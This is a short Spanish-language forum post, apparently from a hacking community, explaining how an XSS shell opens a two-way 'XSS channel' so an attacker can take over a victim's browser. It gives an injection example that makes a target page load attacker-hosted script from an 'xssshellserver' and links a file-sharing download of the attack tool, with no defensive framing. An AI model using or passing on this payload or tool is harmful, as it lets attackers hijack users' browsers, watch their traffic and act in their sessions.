ahora q ya lo soltaron en #RE por fin se puede soltar tan libremente :)
Que es un Canal XSS?
Un Canal XSS es un canal interactivo entre 2 sistemas que se abre mediante un ataque XSS, A nivel tecnico es un tipo de aplicacion AJAX la cual puede solicitar comandos, enviar respuestas y hablar cross-domain.
La shell de xss es una herramienta que puede ser utilizada para configurar un canal xss entre la victima y el atacante, para
que el atacante controle el navegador de su victima mediante el envio de comandos. esta comunicacion es bi-direccional.
Para hacer que la shell trabaje, el atacante necesita inyecctar el JavaScript de la shell XSS que es referenciado mediante un simple xss. desde este punto el atacante es libre de controlar el navegador de su victima, puede ver peticiones, respuestas, y puede hacer q el navegador haga lo q este le pida.
un ejemplo de la inyeccion:
http://victima.com/gay="> script
src="http://xssshellserver/xssshell.asp" /script
http://rapidshare.com/files/214344116/XSSSS_tunelling.rar.html
